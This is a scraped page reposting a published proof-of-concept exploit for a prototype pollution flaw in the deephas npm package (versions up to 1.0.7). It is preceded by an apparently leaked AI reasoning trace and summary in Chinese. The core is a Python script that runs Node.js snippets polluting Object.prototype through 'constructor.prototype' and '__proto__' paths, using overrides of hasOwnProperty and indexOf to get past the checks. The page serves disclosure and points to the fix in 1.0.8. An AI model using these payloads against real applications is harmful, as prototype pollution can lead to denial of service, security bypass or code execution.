deephas < = 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS
好的,我现在需要帮用户总结一篇关于deephas漏洞的文章,控制在100字以内。首先,我得仔细阅读文章内容,理解主要信息。 文章标题提到的是deephas <=1.0.7版本存在原型污染漏洞,可能导致任意代码执行或DoS攻击。接着,描述了漏洞的原因是由于递归属性赋值不安全,缺乏hasOwnProperty检查和路径净化。攻击者可以通过deephas.set()函数供应任意键来污染Object.prototype,从而引发多种安全问题。 然后,文章提供了两个PoC,分别利用了constructor.prototype和__proto__路径来绕过检查。最后给出了修复建议,升级到1.0.8及以上版本。 现在,我需要将这些信息浓缩到100字以内。重点包括:漏洞名称、影响版本、漏洞类型、可能的攻击后果、PoC方法以及修复措施。 确保语言简洁明了,避免使用复杂的术语。同时,按照用户的要求,不需要特定的开头语句。 最后检查字数是否符合要求,并确保所有关键点都被涵盖。 </think> deephas <= 1.0.7 存在原型污染漏洞,可能导致任意代码执行或拒绝服务。攻击者可通过 deephas.set() 污染 Object.prototype,影响包括远程代码执行、DoS 和安全绕过等。该漏洞已修复于 1.0.8 及以上版本。 2026-2-2 21:14:4 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS

#!/usr/bin/env python3 # # Exploit Title: deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS # Google Dork: N/A # Date: 2026-02-01 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Vendor Homepage: https://www.npmjs.com/package/deephas # Software Link: https://github.com/sharpred/deepHas # Version: <= 1.0.7 (fixed in 1.0.8 and later) # Tested on: Node.js 16 / 18 / 20 (Linux / macOS / Windows) # CVE : CVE-2026-25047 # GHSA: GHSA-2733-6c58-pf27 # CVSS: 9.8 (Critical) # # Description: # The 'deephas' npm package suffers from a prototype pollution vulnerability # in versions 1.0.7 and below due to unsafe recursive property assignment # without proper hasOwnProperty checks and inadequate path sanitization. # # An attacker who can supply arbitrary keys to deephas.set() can pollute # Object.prototype — which may lead to: # • Remote code execution (when polluting sensible properties like # process.env, require.extensions, child_process, etc.) # • Denial of Service # • Security bypass (when polluting hasOwnProperty, toString, etc.) # • Privilege escalation in sandboxed / vm2-like environments # # This PoC demonstrates pollution of Object.prototype via two techniques: # 1. constructor.prototype path + hasOwnProperty bypass # 2. __proto__ path + indexOf bypass # # References: # • https://github.com/sharpred/deepHas/security/advisories/GHSA-2733-6c58-pf27 # • https://nvd.nist.gov/vuln/detail/CVE-2026-25047 # # Usage: # 1. npm install [email protected] # 2. python3 poc-deephas-prototype-pollution.py # # Remediation: # Upgrade to deephas >= 1.0.8 # import subprocess import os import textwrap import sys import shutil def run_js(code: str) -> tuple[bool, str, str]: """Execute JavaScript code snippet via Node.js and capture output""" tmp_file = "poc-deephas-temp.js" try: with open(tmp_file, "w", encoding="utf-8") as f: f.write(code.strip()) result = subprocess.run( ["node", tmp_file], capture_output=True, text=True, timeout=10, check=False ) return ( result.returncode == 0, result.stdout.strip(), result.stderr.strip() ) except FileNotFoundError: return False, "", "Node.js not found. Please install Node.js." except subprocess.TimeoutExpired: return False, "", "Execution timed out." except Exception as e: return False, "", f"Error: {str(e)}" finally: if os.path.exists(tmp_file): try: os.remove(tmp_file) except: pass def show_result(name: str, success: bool, stdout: str, stderr: str): print(f"{'─' * 10} {name} {'─' * 10}") if not success: print("STATUS : FAILED") if stderr: print("ERROR :", stderr.splitlines()[0] if stderr.splitlines() else stderr) else: print("(no error message captured)") else: polluted = any(x in stdout.lower() for x in ["yes!!!", "hacked", "polluted"]) status = "VULNERABLE (pollution successful)" if polluted else "UNEXPECTED RESULT" print(f"STATUS : {status}") print() for line in stdout.splitlines(): print(f" {line}") print("─" * 70) print() def main(): print("=" * 70) print(" deephas <= 1.0.7 – Prototype Pollution PoC") print(" CVE-2026-25047 / GHSA-2733-6c58-pf27") print("=" * 70) print() if not shutil.which("node"): print("Error: Node.js is required but not found in PATH.") sys.exit(1) print("[*] Make sure you have installed the vulnerable version:") print(" npm install [email protected]\n") # ── PoC 1: constructor.prototype + hasOwnProperty bypass ─────── poc1 = textwrap.dedent("""\ Object.prototype.hasOwnProperty = () => true; const has = require('deephas'); const obj = {}; has.set(obj, 'constructor.prototype.poc1', 'yes!!!'); console.log('obj.poc1 →', obj.poc1); console.log('{}.poc1 →', {}.poc1); console.log('polluted global? →', {}.poc1 === 'yes!!!'); """) ok1, out1, err1 = run_js(poc1) show_result("PoC 1 – constructor.prototype pollution", ok1, out1, err1) # ── PoC 2: __proto__ + indexOf bypass ────────────────────────── poc2 = textwrap.dedent("""\ String.prototype.indexOf = () => -1; const has = require('deephas'); const obj = {}; has.set(obj, '__proto__.poc2', 'HACKED'); console.log('obj.poc2 →', obj.poc2); console.log('{}.poc2 →', {}.poc2); console.log('polluted global? →', {}.poc2 === 'HACKED'); """) ok2, out2, err2 = run_js(poc2) show_result("PoC 2 – __proto__ + indexOf bypass", ok2, out2, err2) print(" " * 20 + "SUMMARY".center(30, "─")) print("If you see 'yes!!!' or 'HACKED' printed from {}.xxx property") print("→ [email protected] is VULNERABLE to prototype pollution.") print() print("Fix: Upgrade to deephas >= 1.0.8") print("=" * 70) if __name__ == "__main__": main()



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2026020005
如有侵权请联系:admin#unsafe.sh